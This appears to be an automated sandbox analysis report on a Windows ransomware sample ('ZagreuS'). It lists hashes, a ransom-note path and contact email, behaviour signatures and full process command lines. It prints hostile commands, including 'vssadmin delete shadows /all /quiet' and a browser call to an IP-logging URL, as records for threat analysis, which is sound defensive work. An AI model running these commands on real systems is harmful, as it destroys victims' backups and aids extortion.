Analysis
-
max time kernel
140s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 09:34
Static task
static1
Behavioral task
behavioral1
Sample
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Resource
win10v2004-20220414-en
General
-
Target
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
-
Size
750KB
-
MD5
0f081afaae11c154edb8df747d612f93
-
SHA1
7b1478e64453d78ff60eda7b1d2cc3623d4a9210
-
SHA256
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858
-
SHA512
4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628
Malware Config
Extracted
C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt
uncrushman@protonmail.com
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes:
ZagreuS.Ransom.exepid process 2212 ZagreuS.Ransom.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exeZagreuS.Ransom.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation ZagreuS.Ransom.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Generic Ransomware Note 7 IoCs
Ransomware often writes a note containing information on how to pay the ransom.
Processes:
yara_rule generic_ransomware_note generic_ransomware_note generic_ransomware_note C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe generic_ransomware_note behavioral2/memory/2212-133-0x0000000000520000-0x000000000052C000-memory.dmp generic_ransomware_note C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt generic_ransomware_note -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 3828 vssadmin.exe 376 vssadmin.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 3 IoCs
Processes:
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exemsedge.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1081944012-3634099177-1681222835-1000\{9FBD5C30-5048-489B-BE3A-ED9D2EFF7F9D} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 4408 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
AcroRd32.exemsedge.exemsedge.exemsedge.exeAdobeARM.exepid process 5072 AcroRd32.exe 5072 AcroRd32.exe 3000 msedge.exe 3000 msedge.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 520 msedge.exe 520 msedge.exe 5360 msedge.exe 5360 msedge.exe 4680 AdobeARM.exe 4680 AdobeARM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 520 msedge.exe 520 msedge.exe 520 msedge.exe 520 msedge.exe 520 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
vssvc.exedescription pid process Token: SeBackupPrivilege 2816 vssvc.exe Token: SeRestorePrivilege 2816 vssvc.exe Token: SeAuditPrivilege 2816 vssvc.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
AcroRd32.exemsedge.exepid process 5072 AcroRd32.exe 520 msedge.exe 520 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exeAdobeARM.exepid process 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 5072 AcroRd32.exe 4680 AdobeARM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exeZagreuS.Ransom.execmd.execmd.execmd.exemsedge.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 2676 wrote to memory of 2212 2676 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 2676 wrote to memory of 2212 2676 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe ZagreuS.Ransom.exe PID 2676 wrote to memory of 5072 2676 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 2676 wrote to memory of 5072 2676 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 2676 wrote to memory of 5072 2676 ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe AcroRd32.exe PID 2212 wrote to memory of 2792 2212 ZagreuS.Ransom.exe cmd.exe PID 2212 wrote to memory of 2792 2212 ZagreuS.Ransom.exe cmd.exe PID 2212 wrote to memory of 216 2212 ZagreuS.Ransom.exe cmd.exe PID 2212 wrote to memory of 216 2212 ZagreuS.Ransom.exe cmd.exe PID 216 wrote to memory of 3828 216 cmd.exe vssadmin.exe PID 216 wrote to memory of 3828 216 cmd.exe vssadmin.exe PID 2792 wrote to memory of 3944 2792 cmd.exe reg.exe PID 2792 wrote to memory of 3944 2792 cmd.exe reg.exe PID 2212 wrote to memory of 4340 2212 ZagreuS.Ransom.exe cmd.exe PID 2212 wrote to memory of 4340 2212 ZagreuS.Ransom.exe cmd.exe PID 4340 wrote to memory of 376 4340 cmd.exe vssadmin.exe PID 4340 wrote to memory of 376 4340 cmd.exe vssadmin.exe PID 2212 wrote to memory of 520 2212 ZagreuS.Ransom.exe msedge.exe PID 2212 wrote to memory of 520 2212 ZagreuS.Ransom.exe msedge.exe PID 520 wrote to memory of 396 520 msedge.exe msedge.exe PID 520 wrote to memory of 396 520 msedge.exe msedge.exe PID 5072 wrote to memory of 1528 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 1528 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 1528 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4420 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4420 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4420 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 3784 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 3784 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 3784 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4352 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4352 5072 AcroRd32.exe RdrCEF.exe PID 5072 wrote to memory of 4352 5072 AcroRd32.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe PID 3784 wrote to memory of 1612 3784 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2Y1Gy53⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff8d82446f8,0x7ff8d8244708,0x7ff8d82447184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5196 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5512 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:84⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2A0B7BAA5C033A28282DFAB55F0BEF11 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=323923313D96B7F837D85DEC113CB5F9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=323923313D96B7F837D85DEC113CB5F9 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0DED7F5902850FE667EDD412B999B57B --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E15F59B4C3DFAB53F2767A4B791BA51C --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=458959A6BD1D02DF34628D0731C430D9 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FD52362937FB0629E1BBFD50C1581C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,